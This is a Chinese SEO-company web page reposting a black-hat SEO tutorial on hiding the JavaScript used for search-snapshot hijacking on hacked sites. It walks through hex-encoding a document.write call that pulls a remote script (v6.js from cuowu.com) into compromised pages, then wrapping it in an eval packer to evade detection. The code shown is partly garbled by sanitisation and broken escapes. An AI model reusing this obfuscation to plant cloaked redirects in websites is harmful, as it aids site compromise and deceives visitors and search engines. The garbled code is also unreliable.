常见问题

专注SEO排名技术研发,联系我们获得技术支持!

黑帽SEO教程为html中的js跳转url加密

2023-05-04  浏览:0

  有一些黑帽SEO要对跳转的js代码进行加密,学习JavaScript加密方式,当我们网站被黑时,看到这段代码就明白这就是快照劫持的代码,删掉即可解决网站被黑问题。今天,错误博客(cuowu.com)分享的内容为《黑帽SEO教程为html中的js跳转url加密》。希望对大家有所帮助。

  JavaScript跳转是黑帽SEO中快照劫持常见操作手法,比如在寄生虫程序使用中,在被黑掉的html或php中增加如下代码就可以完成快照劫持:

  [xss_clean][xss_clean]

  这段JavaScript代码的作用是引入v6.js文件,v6.js文件中的内容为if判断语句,如果访问的是百度蜘蛛、360蜘蛛、搜狗蜘蛛等,则显示劫持的快照内容,如果是用户直接访问浏览器则会显示原页面内容。

  首先把上面的命令增加为如下:

  window[“document”][“write”](‘scritptype=”text/javascript”scr=”)[xss_clean];

  然后,对前面双引号内的内容进行16进制加密,后面单引号内容也同样进行16进制加密,依次为:

  x64x6fx63x75x6dx65x6ex74

  x77x72x69x74x65

  x73x63x72x69x74x70x20x74x79x70x65x3dx22x74x65x78x74x2fx6ax61x76x61x73x63x72x69x70x74x22x20x73x63x72x3dx22x68x74x74x70x73x3ax2fx2fx63x75x6fx77x75x2ex63x6fx6dx2fx76x36x2ex6ax73

  这个可以用utf-8转16进制加密在线工具即可。错误博客站长导航里面有。

  站长导航(

  加密完成后变为:

  window[“x64x6fx63x75x6dx65x6ex74”][“x77x72x69x74x65”](‘x73x63x72x69x74x70x20x74x79x70x65x3dx22x74x65x78x74x2fx6ax61x76x61x73x63x72x69x70x74x22x20x73x63x72x3dx22x68x74x74x70x73x3ax2fx2fx63x75x6fx77x75x2ex63x6fx6dx2fx76x36x2ex6ax73’)[xss_clean];

  然后,把上述的js代码再次补充一下才能正常运行,即:

  [xss_clean]

  window[“x64x6fx63x75x6dx65x6ex74”][“x77x72x69x74x65”](‘x73x63x72x69x74x70x20x74x79x70x65x3dx22x74x65x78x74x2fx6ax61x76x61x73x63x72x69x70x74x22x20x73x63x72x3dx22x68x74x74x70x73x3ax2fx2fx63x75x6fx77x75x2ex63x6fx6dx2fx76x36x2ex6ax73’)[xss_clean];

  [xss_clean]

  把中间window到[xss_clean];的内容利用站长工具的JS混淆加密压缩就可以得到eval加密形式,错误博客站长导航里面有。

  站长导航(

  获得如下加密代码如下:

  eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!”.replace(/^/,String)){while(c–)d[e(c)]=k[c]||e(c);k=[function(e){returnd[e]}];e=function(){return’\w+’};c=1;};while(c–)if(k[c])p=p.replace(newRegExp(‘\b’+e(c)+’\b’,’g’),k[c]);returnp;}(‘k[“\m\a\1\9\g\5\l\0”][“\b\4\7\0\5”](’\2\1\4\7\0\6\e\0\j\6\5\c\8\0\5\q\0\3\i\d\h\d\2\1\4\7\6\0\8\e\2\1\4\c\8\r\0\0\6\2\n\3\3\1\9\a\b\9\f\1\a\g\3\h\o\f\i\2’)

;’,28,28,’x74|x63|x73|x2f|x72|x65|x70|x69|x22|x75|x6f|x77|x3d|x61|x20|x2e|x6d|x76|x6a|x79|window|x6e|x64|x3a|x36|script|x78|x68′.split(‘|’),0,{}))

  最终获得的加密代码如下:

  [xss_clean]

  eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!”.replace(/^/,String)){while(c–)d[e(c)]=k[c]||e(c);k=[function(e){returnd[e]}];e=function(){return’\w+’};c=1;};while(c–)if(k[c])p=p.replace(newRegExp(‘\b’+e(c)+’\b’,’g’),k[c]);returnp;}(‘k[“\m\a\1\9\g\5\l\0”][“\b\4\7\0\5”](’\2\1\4\7\0\6\e\0\j\6\5\c\8\0\5\q\0\3\i\d\h\d\2\1\4\7\6\0\8\e\2\1\4\c\8\r\0\0\6\2\n\3\3\1\9\a\b\9\f\1\a\g\3\h\o\f\i\2’)

;’,28,28,’x74|x63|x73|x2f|x72|x65|x70|x69|x22|x75|x6f|x77|x3d|x61|x20|x2e|x6d|x76|x6a|x79|window|x6e|x64|x3a|x36|script|x78|x68′.split(‘|’),0,{}))

  [xss_clean]

  这就是全部的js加密压缩过程了,解压过程反过来推就可以了。

  以上就是错误博客(分享的内容为《黑帽SEO为html中的js加密(js混淆与16进制加密)》。感谢您的阅读。更多原创搜索“错误博客”。

声明:免责声明:本文内容来源于互联网,本网站不拥有所有权,也不承认相关法律责任。
  • 1865692

    累积优化关键词

  • 93%

    +

    首页上词率高达90%+

  • 183W

    +

    183W+独家IP资源

  • 3000

    +

    与3000余家企业客户携手

提供保姆式的SEO优化排名服务,独家研发排名技术,源头技术厂家,快速上首页,帮您获取更多客户资源!

联系我们

TG : @pagoda1993

公司:

九狐科技技术有限公司

地址:江西省南昌市南昌县小蓝国家经济技术开发区汇仁大道266号